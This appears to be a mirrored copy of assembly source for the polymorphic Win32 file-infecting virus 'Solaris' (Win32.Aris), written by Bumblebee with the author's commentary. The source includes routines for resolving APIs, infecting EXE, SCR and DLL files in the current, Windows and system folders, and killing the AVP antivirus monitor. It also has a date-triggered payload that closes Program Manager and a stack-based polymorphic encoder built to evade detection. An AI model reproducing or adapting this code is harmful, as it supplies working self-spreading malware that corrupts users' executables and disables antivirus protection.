mirror of
synced 2025-02-26 00:14:43 +00:00
1978 lines
60 KiB
1978 lines
60 KiB
; Solaris (AKA Win32.Aris)
; coded by Bumblebee
; ---------------------------------------------------------------------
; Contents
; 1. Disclaimer
; 2. Introduction
; 3. Virus overview
; 4. BSEE review
; This is the source code of a VIRUS. The author is not responsabile of
; any damage that may occur due to the assembly of this file. Use it at
; your own risk.
; Each time i see Plage 2000 itw and i hear ppl like my worms i feel
; sad, coz those bugs didn't made me think at all. Them're kinda a toy
; i coded fast and easily. So i liked to code something complex with
; Solaris. Just to prove myself i can do other things but worms.
; My late viruses are kinda experimental and outta lab them won't be
; able to spread so far. So this is my way back to the bussiness and
; the so called *serious things*.
; The name of this virus is a a lil tribute to the magician of hard
; sci-fi, Stanislav Lem, and his great book Solaris. Just think Ursula
; Le Guin calls him master of imagination (together with J. L. Borges,
; another great monster).
; Well, i suppose retarded avers will call it as it goes out from their
; ass. Doesn't matter, let's call it Solaris :)
; As well as the planet in the book, you won't be able to understand
; Solaris easily (at least i hope so).
; It's a polymorphic win32 direct action PE infector that infects EXE,
; SCR and DLL files form current, windows and system folders. Due the
; generated poly code it's very huge and its generation is complex the
; virus behavior has been setup for being a slow infector. It's better
; to have a slow infector than suddenly to have a slow computer. The
; generated poly code includes also the virus code coz the virus is
; pushed into the stack and executed there. That's main reason it's not
; a big virus, we cannot use too much stack (remember DLL are also
; infected by the virus, you should know the consequences).
; Both poly engine and the fact it must be fully relocatable to infect
; DLLs is not easy task. DLL infection makes the virus able to spread
; faster as many DLLs are infected. But again that makes the comp slow
; coz there are several virus instances working at the same time. I've
; used shared files by name to avoid that in a kinda successfuly way.
; Even the virus has other features, eg. 2nd non-poly encryption layer,
; its most interesting features come from the not usual poly engine and
; the DLL infection (very annoying).
; The source is full commented. I hope i've introduced Solaris.
; Here i include an host increased size review (BSEE with Solaris test
; version size 3420, final sample is about 4kbs):
; target: ping.exe (OS Win98 4.10.1998)
; original size: 28.672 bytes
; object/file align: 1000h/1000h
; virus padding: 101
; samples infected: 52
; Note: 1st gen infected 1st sample. Sample j was infected by j-1
; sample.
; Frequency tabulation for infected samples with RECLEVEL 6
; size freq. Cu. freq. increase
; ----------------------------------------------
; 61.509 02 02 32.837
; 65.549 22 24 36.877
; 69.690 22 46 41.018
; 73.730 06 52 45.058
; ----------------------------------------------
; average final size: 68.093
; average increased size: 39.417
; We can see how median is very close to average. So even samples have
; variable size, that size fits in a normal distribution. Kewl test for
; a random number generator :)
; At one hand we have than PE aligment makes us lose some of the sense
; of the test, but at other hand since we will manage aligned files nor
; true poly size... that fact doesn't matters for the test.
; Gen codes have very variable size but due PE aligment issues we only
; see 4 different file sizes.
; The way of the bee
.model flat,STDCALL
extrn ExitProcess:PROC ; required for 1st gen
extrn MessageBoxA:PROC
; from BC++ Win32 API on-line Reference
dwFileAttributes dd 0
dwLowDateTime0 dd ? ; creation
dwHigDateTime0 dd ?
dwLowDateTime1 dd ? ; last access
dwHigDateTime1 dd ?
dwLowDateTime2 dd ? ; last write
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0)
; about 1st gen:
; as you'll see i use lot of tricks to make 1st gen run. that's due
; the way the virus executes is quite *anti-natural*
; to sum up: 1st gen emulates the execution in the stack
; notice there is required the write attrib in the code section
; but in next generations it won't be necessary.
vSize equ vEnd-vBegin
PADDING equ 101
MAXPATH equ 160
RECLEVEL equ 6 ; poly engine's top
; recursive level
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
vBegin label byte
jmp setupVirus ; make some init
nop ; nops for size fit with
nop ; code to restore
; Following code will be put instead jmp setupVirus and nops
; after init process...
; sub esp,8
; mov esi,dword ptr [esp+vSize+28h] ; get value from stack
; to guess K32 addr
call decrypt ; decrypt layer
jmp beginEncLayer
; simple encryption layer
mov eax,12345678h
encKey equ $-4
mov edi,dword ptr [esp]
sub edi,offset rtdelta
lea edi,beginEncLayer+edi
mov ecx,(vEnd-beginEncLayer)/4
xor dword ptr [edi],eax
sub edi,-4
loop encodeLayer
call getDelta ; get delta offset
; we have a great problem with relocatable code
; coz we cannot rely in relative jmps due we don't
; know where is running the virus (stack? tmp mem? uh?)
; and we cannot do standard trick of checking displacement
; of virus ep relative to calculated values at infection
; time due the same shit. So, what's the solution?
; we calc delta offset for host, pushing in the stack
; the addr of the jmp esp into the poly code ;)
; it's not simple at all, but works.
mov edx,dword ptr [esp] ; get the ret addr
sub edx,dword ptr [esp+4h] ; sub calculated addr
; reloc data will be calculated at infection time as:
; virus enc virt addr + virus encoded size + push size + call size
add dword ptr [hostEP+ebp],edx ; fix host ep addr
; as result we can infect relocatable hosts ;)
xor edx,edx
lea eax,dword ptr [esp-8h] ; setup SEH frame
xchg eax,dword ptr fs:[edx]
call pushExceptionCodeAddr
xor eax,eax ; restore all
mov eax,dword ptr fs:[eax]
mov esp,dword ptr [eax]
xor eax,eax ; and remove frame
pop dword ptr fs:[eax]
pop eax
jmp returnHost ; go back host
push eax
GetKernelLoop: ; look for kernel32.dll
cmp word ptr [esi],'ZM'
jne GetKernel32NotFound
mov dx,word ptr [esi+3ch]
cmp esi,dword ptr [esi+edx+34h]
je GetKernel32Found
dec esi
jmp GetKernelLoop
xor eax,eax ; remove SEH
pop dword ptr fs:[eax]
pop eax
; now get APIs using CRC32 (esi has k32 addr)
mov edi,esi
mov esi,dword ptr [esi+3ch]
add esi,edi
mov esi,dword ptr [esi+78h]
add esi,edi
add esi,1ch
add eax,edi
mov dword ptr [address+ebp],eax
add eax,edi
mov dword ptr [names+ebp],eax
add eax,edi
mov dword ptr [ordinals+ebp],eax
sub esi,16
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,edi
push eax edx edi
xor edi,edi
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edi edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je returnHost
jmp searchl
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,edi
mov dword ptr [eax+5],ecx
add eax,9
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea ecx,ENDAPI+ebp
cmp eax,ecx
jb searchl
; API search done
; here follows a nice trick ;)
; this is a reentrance lock to avoid multiple
; instances of the virus running in the same process due:
; - multithreading
; - dll
; - epo
; - re-exec host (no really same process, but that's
; not allowed due as side effect of the trick)
; i use the random object name generated at infection time
; to create a named file mapping object. the name is 10
; char long and contains only numbers: '0'...'9'
; that allows multiples instances of the virus, but not in
; the same process... in this way we avoid overload the process
; (eg. each virus instance allocs memory and the viral
; activity itself and ...) and problems due virus-in-host
; exclusive behavior
xor eax,eax
lea esi,fileMappingObj+ebp
push esi
push 1024 ; bah, size doesn't
push eax ; matter :) hehehe
push 00000004h
push eax
dec eax
push eax
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz returnHost
call dword ptr [_GetLastError+ebp]
cmp eax,0b7h ; already executed?
je returnHost
; alloc some memory to build there the virus sample used
; to infect and to store the virus body sample that will be
; executed there...
; Alloc aproximation of virus required buffer
push 00000004h
push 00001000h OR 00002000h
push (vSize*2+vSize*3*RECLEVEL+MAXPATH*2)
; due the poly generated
push 0h ; code is recursive i don't
call dword ptr [_VirtualAlloc+ebp] ; know 100% the max size
or eax,eax ; (and i'm lazy to look for
jz returnHost ; worst case)
mov dword ptr [virusSample+ebp],eax
; fix the return host addr to be used in memory
mov edx,dword ptr [hostEP+ebp]
mov dword ptr [inMemH+ebp],edx
lea esi,vBegin+ebp ; copy virus to tmp mem
mov edi,eax
mov ecx,vSize
rep movsb
add eax,inMemory-vBegin
push eax
ret ; goto mem copy
returnHost: ; return control to host
add esp,vSize+8 ; fix stack
push offset fakeHost ; saved host EP
hostEP equ $-4
add esp,vSize+8 ; fix stack
push 12345678h
inMemH equ $-4
; here we are running in tmp memory
; and we've fixed the stack. From here to end of virus
; we cannot jmp returnHost. Use IMReturnHost instead.
; the return address of the host with relocation fix
; is yet in the stack so a simple ret will bring us back host
call getDelta ; get delta offset again
; get non k32 apis
; 1st load IMGAGEHLP.DLL
xor eax,eax
mov dword ptr [_CheckSumMappedFile+ebp],eax
lea eax,imagehlpdllStr+ebp
push eax
call dword ptr [_LoadLibraryA+ebp]
mov dword ptr [imagehlpdllHnd+ebp],eax
or eax,eax
jz imagehlpdllError
; get API for updating PE checksum
lea esi,CheckSumMappedFileStr+ebp
push esi
push eax
call dword ptr [_GetProcAddress+ebp]
mov dword ptr [_CheckSumMappedFile+ebp],eax
; 2nd load SFC.DLL
xor eax,eax
mov dword ptr [_SfcIsFileProtected+ebp],eax
lea eax,sfcdllStr+ebp
push eax
call dword ptr [_LoadLibraryA+ebp]
mov dword ptr [sfcdllHnd+ebp],eax
or eax,eax
jz sfcdllError
; get API for avoid infect SFC protected files
lea esi,SfcIsFileProtectedStr+ebp
push esi
push eax
call dword ptr [_GetProcAddress+ebp]
mov dword ptr [_SfcIsFileProtected+ebp],eax
; 3rd load USER32.DLL
lea eax,user32dllStr+ebp
push eax
call dword ptr [_LoadLibraryA+ebp]
or eax,eax
jz user32dllError
mov dword ptr [user32dllHnd+ebp],eax
; get API needed for payload (and to fuck avp monitor)
lea esi,FindWindowAStr+ebp
push esi
push eax
call dword ptr [_GetProcAddress+ebp]
or eax,eax
jz user32dllErrorFree
mov dword ptr [_FindWindowA+ebp],eax
lea esi,PostMessageAStr+ebp
push esi
push dword ptr [user32dllHnd+ebp]
call dword ptr [_GetProcAddress+ebp]
or eax,eax
jz user32dllErrorFree
mov dword ptr [_PostMessageA+ebp],eax
; check payload activation
lea eax,fileTime0+ebp
push eax
call dword ptr [_GetSystemTime+ebp]
lea esi,fileTime0+ebp
mov ax,word ptr [esi+2]
mov dx,-1
month equ $-2
cmp dx,ax ; right month?
jne skipPayload
mov ax,word ptr [esi+4]
mov dx,-1
dayOfWeek equ $-2
cmp dx,ax ; right day of week?
jne skipPayload
lea esi,payloadStr+ebp ; well, close program
jmp disableMON ; manager ;)
; it's really harmless, only annoying you won't
; be able to use Program Manager for about 4 days
; in a month... hehehe
; ok, just update payload values for next infections
mov ax,word ptr [esi+4]
mov word ptr [dayOfWeek+ebp],ax ; same day
mov ax,word ptr [esi+2] ; wait 6 months
add ax,6 ; to trigger
cmp ax,12
jbe notFixMonth
sub ax,12
mov word ptr [month+ebp],ax
; if today is not the party, just try to close avp
; monitor usign its window's name
lea esi,avStr+ebp
push esi
xor eax,eax
push eax
call dword ptr [_FindWindowA+ebp]
or eax,eax
jz user32dllErrorFree
mov edx,eax
xor eax,eax
push eax
push eax
push 00000012h
push edx
call dword ptr [_PostMessageA+ebp]
push dword ptr [user32dllHnd+ebp]
call dword ptr [_FreeLibrary+ebp]
; setup seed of random number generator
call randomize
; setup path buffers
mov eax,dword ptr [virusSample+ebp]
add eax,(vSize*2+vSize*3*RECLEVEL)
mov dword ptr [path0+ebp],eax
add eax,MAXPATH
mov dword ptr [path1+ebp],eax
mov byte ptr [infCount+ebp],3 ; infect 3 files
call scanFolder
; get current directory
push dword ptr [path0+ebp]
call dword ptr [_GetCurrentDirectoryA+ebp]
or eax,eax
jz IMReturnHost
push MAXPATH ; get windows directory
push dword ptr [path1+ebp]
call dword ptr [_GetWindowsDirectoryA+ebp]
or eax,eax
jz IMReturnHost
; goto windows directory
push dword ptr [path1+ebp]
call dword ptr [_SetCurrentDirectoryA+ebp]
or eax,eax
jz IMReturnHost
mov byte ptr [infCount+ebp],2 ; infect 2 files
call scanFolder
push MAXPATH ; get system directory
push dword ptr [path1+ebp]
call dword ptr [_GetSystemDirectoryA+ebp]
or eax,eax
jz goHomeDir
; goto system directory
push dword ptr [path1+ebp]
call dword ptr [_SetCurrentDirectoryA+ebp]
or eax,eax
jz goHomeDir
mov byte ptr [infCount+ebp],5 ; infect 5 files
call scanFolder
; go home directory
push dword ptr [path0+ebp]
call dword ptr [_SetCurrentDirectoryA+ebp]
; free non k32 dlls
mov eax,dword ptr [imagehlpdllHnd+ebp]
or eax,eax
jz imagehlpdllFreed
push eax
call dword ptr [_FreeLibrary+ebp]
; free SFL.DLL
mov eax,dword ptr [sfcdllHnd+ebp]
or eax,eax
jz sfcdllFreed
push eax
call dword ptr [_FreeLibrary+ebp]
; Scan current folder for EXE, SCR and DLL files suitable for infect
; Why not to infect CPL files?
; 1. Them doesn't go any plaze, and for system prevaleance we have
; SCR, EXE and DLL.
; 2. CPL are strange DLL that sometimes play with 16 bits shit. Take
; as example desk.cpl under win9x: it's infection is quite unestable.
; Notice DLL is its main way for spreading, indeed all features of a
; direct action infector are also available.
lea eax,find_data+ebp
push eax
lea eax,fndMask+ebp
push eax
call dword ptr [_FindFirstFileA+ebp]
inc eax
jz notFound
dec eax
mov dword ptr [findHnd+ebp],eax
; avoid hugah files
mov eax,dword ptr [find_data.nFileSizeHigh+ebp]
or eax,eax
jnz skipThisFile
; check size padding
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
mov ecx,PADDING
xor edx,edx
div ecx
or edx,edx ; reminder is zero?
jz skipThisFile
lea esi,find_data.cFileName+ebp
; get extension
inc esi
cmp byte ptr [esi],0
jne lookEndStr
; skip shit
cmp byte ptr [esi-1],'"'
jne notShitInFilename
dec esi
mov eax,dword ptr [esi-4]
mov dword ptr [tmpExt+ebp],eax
; make ext upper case
lea esi,tmpExt+ebp
mov ecx,4
cmp byte ptr [esi],'a'
jb notChangeLetter
cmp byte ptr [esi],'z'
ja notChangeLetter
sub byte ptr [esi],'a'-'A'
inc esi
loop upCaseLoop
mov eax,dword ptr [tmpExt+ebp]
not eax
; check has a valid extension
cmp eax,NOT 'LLD.'
je validExt
cmp eax,NOT 'EXE.'
je validExt
cmp eax,NOT 'RCS.'
jne skipThisFile
; try to infect it
lea esi,find_data.cFileName+ebp
call infect
; reached max infections?
cmp byte ptr [infCount+ebp],0
je endScan
lea eax,find_data+ebp
push eax
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp]
or eax,eax
jnz findNext
push dword ptr [findHnd+ebp]
call dword ptr [_FindClose+ebp]
; in: esi filename to infect (not save regs)
; check if SFC is available
mov eax,dword ptr [_SfcIsFileProtected+ebp]
or eax,eax
jz nonSfcProtectedFile
push esi ; save filename
xor eax,eax
push esi
push eax
call dword ptr [_SfcIsFileProtected+ebp]
pop esi ; restore filename
or eax,eax
jz nonSfcProtectedFile
jmp infectionError
push esi ; save filename
push esi
call dword ptr [_GetFileAttributesA+ebp]
pop esi ; restore filename
inc eax
jz infectionError
dec eax
mov dword ptr [fileAttrib+ebp],eax ; save attributes
push esi ; save filename
push 00000080h ; clear file attributes
push esi
call dword ptr [_SetFileAttributesA+ebp]
pop esi ; restore filename
or eax,eax
jz infectionError
push esi ; save filename
xor eax,eax
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp] ; open file
inc eax
jz infectionErrorAttrib
dec eax
mov dword ptr [fHnd+ebp],eax ; save handle
push 0h
push eax
call dword ptr [_GetFileSize+ebp] ; get filesize
inc eax
jz infectionErrorClose
dec eax
mov dword ptr [fileSize+ebp],eax
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_GetFileTime+ebp] ; get file date/time
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp] ; create a file map obj
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
mov dword ptr [fhmap+ebp],eax ; save handle
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp] ; map a view for the obj
or eax,eax
jz infectionErrorCloseMap
mov dword ptr [mapMem+ebp],eax ; save addr
mov edi,eax
cmp word ptr [edi],'ZM' ; check exe
jne infectionErrorCloseUnmap
cmp dword ptr [edi+18h],3ah ; check PE sign
jb infectionErrorCloseUnmap
add edi,dword ptr [edi+3ch]
cmp word ptr [edi],'EP'
jne infectionErrorCloseUnmap
movzx edx,word ptr [edi+16h] ; check executable
test edx,2h
jz infectionErrorCloseUnmap
; if we failed to get the API to update pe checksum just
; avoid infect dll files
mov eax,dword ptr [_CheckSumMappedFile+ebp]
or eax,eax
jnz dllAreOk
test edx,2000h ; check not DLL
jnz infectionErrorCloseUnmap
movzx edx,word ptr [edi+5ch]
dec edx ; check not native
jz infectionErrorCloseUnmap
cmp word ptr [edi+1ch],0 ; has code? that's important
je infectionErrorCloseUnmap ; remember dll with only
; resources
mov esi,edi ; save begin PE hdr
mov eax,18h
add ax,word ptr [edi+14h]
add edi,eax ; goto 1st section
mov cx,word ptr [esi+06h] ; now to last sect
dec cx
mov eax,28h
mul cx
add edi,eax
mov ecx,dword ptr [edi+14h] ; phys offset
add ecx,dword ptr [edi+10h] ; phys size
cmp ecx,dword ptr [fileSize+ebp] ; avoid not nice files
jne infectionErrorCloseUnmap ; also avoid reinfect files
; following code has no sense with READ attrib only required
; in last section. we rely in size padding.
; check sect properties to see if probably infected yet
; mov eax,dword ptr [edi+24h]
; and eax,00000020h OR 20000000h OR 40000000h
; cmp eax,00000020h OR 20000000h OR 40000000h
; je infectionErrorCloseUnmap
mov eax,dword ptr [edi+0ch] ; sect RVA
add eax,dword ptr [edi+10h] ; phys size
xchg eax,dword ptr [esi+28h] ; put ep and get old
add eax,dword ptr [esi+34h] ; add image base
mov dword ptr [hostEP+ebp],eax ; save it
xor eax,eax
mov dword ptr [esi+58h],eax ; zero PE checksum
; will be updated later
; if all goes fine
; usually: CODE, EXECUTE and READ
; or dword ptr [edi+24h],00000020h OR 20000000h OR 40000000h
; only READ flag needed (CODE and EXEC are not required)
or dword ptr [edi+24h],40000000h
; not discardable and not shareable
and dword ptr [edi+24h],NOT (02000000h OR 10000000h)
; create a virus sample for this host
mov eax,dword ptr [esi+28h]
add eax,dword ptr [esi+34h]
push eax ; virus ep
call infectionSample
mov dword ptr [genSize+ebp],eax ; save encoded size
push dword ptr [fileSize+ebp] ; save old file size
; eax has encoded size
mov edx,dword ptr [edi+10h]
sub dword ptr [fileSize+ebp],edx ; sub old phys size
add eax,dword ptr [edi+10h] ; calc new sect phys size
mov ecx,dword ptr [esi+3ch]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [edi+10h],eax
add dword ptr [fileSize+ebp],eax ; add new phys size
add eax,dword ptr [edi+0ch] ; calc new image size
mov ecx,dword ptr [esi+38h]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [esi+50h],eax
sub eax,dword ptr [edi+0ch] ; sub sect RVA
mov dword ptr [edi+08h],eax ; save sect new virt size
; now calc padding
mov eax,dword ptr [fileSize+ebp]
mov ecx,PADDING
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [padding+ebp],eax ; save new file size with
; padding added
pop dword ptr [ofileSize+ebp] ; get old file size
; now make file grow
push dword ptr [mapMem+ebp]
call dword ptr [_UnmapViewOfFile+ebp]
push dword ptr [fhmap+ebp]
call dword ptr [_CloseHandle+ebp]
xor eax,eax
push eax
push dword ptr [padding+ebp]
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
mov dword ptr [fhmap+ebp],eax
xor eax,eax
push dword ptr [padding+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
mov dword ptr [mapMem+ebp],eax
; end the infection process just adding virus body
mov ecx,dword ptr [genSize+ebp]
mov esi,dword ptr [virusSample+ebp]
add esi,vSize*2
mov edi,eax
add edi,dword ptr [ofileSize+ebp]
rep movsb
mov ecx,dword ptr [padding+ebp] ; fill padding with
sub ecx,dword ptr [ofileSize+ebp] ; zeroes
sub ecx,dword ptr [genSize+ebp]
xor eax,eax
rep stosb
mov eax,dword ptr [_CheckSumMappedFile+ebp]
or eax,eax
jz skipCheckSumUpdate
lea eax,nchksum+ebp
push eax
lea eax,ochksum+ebp
push eax
push dword ptr [padding+ebp]
push dword ptr [mapMem+ebp]
call dword ptr [_CheckSumMappedFile+ebp]
or eax,eax
jz skipCheckSumUpdate
mov edx,dword ptr [nchksum+ebp] ; update checksum
mov dword ptr [eax+58h],edx
dec byte ptr [infCount+ebp] ; another infection
push dword ptr [mapMem+ebp] ; unmap view
call dword ptr [_UnmapViewOfFile+ebp]
push dword ptr [fhmap+ebp] ; close map file obj
call dword ptr [_CloseHandle+ebp]
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp] ; restore date/time
call dword ptr [_SetFileTime+ebp]
push dword ptr [fHnd+ebp] ; close file
call dword ptr [_CloseHandle+ebp]
pop esi ; restore filename
push dword ptr [fileAttrib+ebp]
push esi ; restore attributes
call dword ptr [_SetFileAttributesA+ebp]
; DWORD infectionSample(DWORD push_val) (save regs)
; push_val: enc virus virt addr (virus ep)
; it's required to setup the push used for relocation stuff
; returns gen size
push eax
; get a new crypt key
push 0ffffffffh
call rndInRange
or eax,eax
jz anotherKey
mov dword ptr [encKey+ebp],eax
; gen a random filemapping Object name
lea esi,fileMappingObj+ebp
mov ecx,10
mov edi,ecx
mov eax,10
push eax
call rndInRange
add al,'0'
cmp edi,eax ; ok, i rely in the rnd
je getFileMappingObjName ; generator, but... hehe
mov edi,eax
mov byte ptr [esi],al
inc esi
loop getFileMappingObjName
; copy virus
lea esi,vBegin+ebp
mov edi,esi
add edi,vSize
push edi
mov ecx,vSize
rep movsb
; encrypt it
pop edi
mov eax,dword ptr [encKey+ebp]
add edi,beginEncLayer-vBegin
mov ecx,(vEnd-beginEncLayer)/4
call encodeLayer
; now encode the virus
mov eax,dword ptr [virusSample+ebp]
add eax,vSize*2
push eax ; save begin of env vir
push eax
call encodeVirus
mov dword ptr [genSize+ebp],eax ; save enc vir size
pop edi ; restore begin enc vir
add edi,eax ; begin of jmp code
; setup push for reloc stuff
; encoded vir size
add eax,dword ptr [esp+28h] ; push_val
push eax ; save it
call GetReg ; get rnd reg
; get push reloc (bad)
pop edx ; mov reg32,imm32
push edi ; need to calc size
mov cl,al
push ecx
call AddMovREGIMM
pop ecx ; push reg32
push eax
call AddPushREG
pop eax ; free the reg
call FreeReg
pop edx
mov ebx,edi
sub ebx,edx
add ebx,5
add dword ptr [edx+1],ebx ; fix push reloc (good)
push ebx ; save size
mov al,0e8h ; call
xor eax,eax
push edi ; we need calc size again
; now we need to sub 8 to esp, do it poly
mov eax,12 ; get random reg
push eax
call rndInRange
cmp eax,_ESP ; skip esp reg
jne notFixRndReg0
inc eax
cmp eax,8 ; case reg 8,9,10,11
jb addPops0 ; it's spezial:
mov al,83h ; sub esp,8
mov ax,08c4h
jmp doneStack
mov cl,al
call AddPopREG ; add 1 pop reg32
mov eax,14 ; get random reg
push eax
call rndInRange
cmp eax,_ESP ; skip esp reg
jne notFixRndReg1
inc eax
cmp eax,8 ; 8,9,10,11,12,13 reg:
jb addPops1 ; sub esp,4
mov al,83h
mov ax,04c4h
jmp doneStack
mov cl,al
call AddPopREG ; add 1 pop reg32
mov ax,0e4ffh ; jmp esp
pop edx ; get old ptr pos
mov ebx,edi
sub ebx,edx ; cal new size
pop edx ; get old size
add edx,ebx ; total added size
add edx,dword ptr [genSize+ebp] ; plus encoded size
mov dword ptr [esp+20h],edx
pop eax
retn 4
; DWORD randomize(VOID) (not save regs)
call dword ptr [_GetTickCount+ebp]
imul eax,0C6EF3720h
add dword ptr [rseed+ebp],eax
; DWORD rndInRange(DWORD range) (save regs)
push eax
mov eax,87654321h
rseed equ $-4
imul eax,9E3779B9h
shr eax, 16
add dword ptr [rseed+ebp],eax
lea esi,rseed+ebp
mov edi,4
call CRC32
xor edx,edx
mov ecx,dword ptr [esp+28h]
div ecx
mov dword ptr [esp+20h],edx
pop eax
retn 4
; VOID getDelta(VOID) (modifies ebp=delta offset)
call deltaOffset
; the virus identifier :)
virusId db '[ Solaris by Bumblebee ]'
pop ebp
sub ebp,offset virusId
; in: esi addr src
; edi size of src
; out: eax crc32 of src
; (not save regs)
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
xor eax,eax
xor ebx,ebx
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
; [BSEE] or
; Bumblebee's Stack Encoding Engine or
; Bumblebee's Solaris Encoding Engine ;)
; quite simple it encodes the virus into a poly code that pushes
; the whole virus in the stack. the relocation stuff is not
; added here, so you can use the engine just adding a jmp esp
; after the encoded virus (but notice the pushad!).
; it makes different operations with data being stored in the
; stack before being pushed.
; it doesn't adds garbage. the encoded virus is long and poly
; enought to not need garbage (IMHO). as i'm not a good poly
; coder, that's a kewl engine if we think what i used to code hehe
; returns the encoded size. the esp value is decreased by vSize
; and virus size must be dword aligned. 1st byte it's a pushad.
; DWORD encodeVirus(DWORD dest_addr) (returns size and saves regs)
push eax
; init register control
xor eax,eax
lea edi,RegStatus+ebp
mov ecx,8
rep stosb
mov byte ptr [RegStatus+ebp+_ESP],1
mov edi,dword ptr [esp+28h] ; get dest addr
mov eax,vSize
mov ecx,4
xor edx,edx
div ecx
mov ecx,eax ; dword's to encode
xor ebx,ebx ; to store size
mov esi,dword ptr [virusSample+ebp]
add esi,vSize*2
sub esi,4
mov al,60h ; 1st pushad
inc ebx
; random encoding
mov eax,5 ; scheme for each dword
push eax
call rndInRange
cmp eax,1 ; 40%
je encRndAddSubReg
cmp eax,2
je encRndAddSubReg
cmp eax,3 ; 20%
je encRndPushReg
cmp eax,4 ; 20%
je encRndCmpRegImm
jmp encPushImm32 ; default 20%
; Polymorphic engine data
RegStatus db 8 dup(0) ; 1: used 0: free
WorkReg db 0 ; 0..7
RecursiveCoef dd 0 ; rec level in rec calls :P
; push imm32
mov al,68h ; push xxxxxxxxh
stosb ; store
lodsd ; get dword
stosd ; store dword
add ebx,5 ; push + inm32 = 5 bytes
loop encodeVirus0
mov dword ptr [esp+20h],ebx ; set return value
pop eax
retn 4
push ecx ebx ; save loop and size
call addAddSubRegImm
pop ebx ecx ; restore regs
add ebx,eax ; add encoded size
jmp doLoop
; cmp reg,imm32
; <jmp: jb jnb je jne jbe ja js> op0
; jmp op1
; [poly code to encode n dwords]
; jmp op2
; [poly code to encode n dwords]
; both options encode the same code but in different way
; it supports recursive calls, so [poly code to encode n dwords]
; can be generated also by this routine...
mov eax,RECLEVEL ; setup recursive coeff
push eax
call rndInRange
inc eax
mov byte ptr [RecursiveCoef+ebp],al
push ecx ebx ; save loop and size
call addRndCmpRegImm
pop ebx ecx ; restore regs
jc encRndAddSubReg
add ebx,eax ; add encoded size
sub ecx,edx ; dec loops
; that's needed coz we
; get edx dwords in one
; main loop
jmp doLoop
dec byte ptr [RecursiveCoef+ebp]
xor eax,eax
mov al,byte ptr [RecursiveCoef+ebp]
or al,al
jz recursiveOver
cmp ecx,eax ; check we have things
jae hasSpaceToEncode ; to encode
push edi ; save prt addr
mov eax,0ffffffffh ; get a random dword value
push eax
call rndInRange
push eax
call GetReg ; get random reg
pop edx
mov cl,al
push eax
call AddCmpREGIMM
pop eax
call FreeReg ; free the register
mov eax,7 ; get a random jmp
push eax
call rndInRange
add al,72h ; store the cnd jmp
mov al,5
mov al,0e9h ; setup jmp far
push edi ; save ptr addr
stosd ; save space
push esi ; save source
xor ecx,ecx
mov cl,byte ptr [RecursiveCoef+ebp] ; get # dword to encode
push ecx ; save loops
xor ebx,ebx
push ecx ebx ; save loop and size
mov eax,2 ; recursive?
push eax
call rndInRange
or al,al
jz nonRec0
mov al,byte ptr [RecursiveCoef+ebp]
or al,al
jz nonRec0
push dword ptr [RecursiveCoef+ebp]
call addRndCmpRegImm
pop dword ptr [RecursiveCoef+ebp]
jnc nonRec1
call addAddSubRegImm
pop ebx ecx ; restore regs
jmp nonRec2
pop ebx ecx ; restore regs
sub ecx,edx
add ebx,eax ; add encoded size
loop encodeCmpLoop0
pop ecx ; get loops
pop esi ; restore source
pop edx ; get prt addr
add ebx,5
mov dword ptr [edx],ebx ; fix op1 jmp
mov eax,5 ; add DS: prefix?
push eax
call rndInRange
cmp al,3 ; 30%
jb skipDSPrefix
inc byte ptr [edx] ; a byte before jmp!
mov al,3eh ; DS: (thanx griyo!)
stosb ; nice anti-h stuff
mov al,0e9h ; build jmp
push edi ; save ptr addr
stosd ; save space
; we have ecx and esi ready
push ecx ; save loops again
xor ebx,ebx
push ecx ebx ; save loop and size
mov eax,2 ; recursive?
push eax
call rndInRange
or al,al
jz nonRec3
mov al,byte ptr [RecursiveCoef+ebp]
or al,al
jz nonRec3
push dword ptr [RecursiveCoef+ebp]
call addRndCmpRegImm
pop dword ptr [RecursiveCoef+ebp]
jnc nonRec4
call addAddSubRegImm
pop ebx ecx ; restore regs
jmp nonRec5
